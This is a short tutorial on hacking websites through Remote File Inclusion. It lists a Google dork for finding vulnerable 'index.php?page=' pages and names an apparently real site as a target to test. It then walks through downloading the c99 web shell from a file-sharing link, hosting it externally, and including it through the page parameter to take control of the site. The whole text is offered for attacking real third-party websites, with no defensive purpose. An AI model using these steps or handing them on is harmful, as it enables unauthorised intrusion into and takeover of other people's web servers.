Hack websites by Using Remote File Intrusion (RFI)

Remote File Intrusion is one of the most common vulnerability found in web application. This allows the attacker to add remote files on the web server.
If the attack is successful, the attacker will gain access to the web server and can execute any command on it.

Remote File inclusion vulnerability usually occur in those sites which have a navigation like this:



" http://www.blablabla.com/index.php?page=Anything "



To find the vulnerability the attacker will most commonly use the following Google Dork:



“ inurl:index.php?page= ” (type in google search: index.php?page=)

This will show all the pages which has “ index.php?page= ” in their URL.



This is an example of a site that is vulnerable to this kind of attack:


" http://www.cbspk.com/v2/index.php?page= "



To test whether the site is vulnerable, type at the end http://www.google.com.

so the site is now:


" http://www.cbspk.com/v2/index.php?page=http://www.google.com "


This will test the site whether it is vulnerable to this kind of attack or not.

If this did not work for the site you are using it to, then find another site.



Now, a hacker will upload his shells to gain access to the site. The most common shell is c99 shell. Just google it or use this link that i found:

http://www.4shared.com/file/107930574/28...ff=7637829



Now Upload the file you downloaded to any webhosting sites like ripway.com.



Now the hacker should execute this command to have access:

http://www.cbspk.com/v2/index.php?page=h...l/c99.txt?


REMEMBER!!!:

always place the (?) question mark at the end.


Now you can do what you want to do to the site!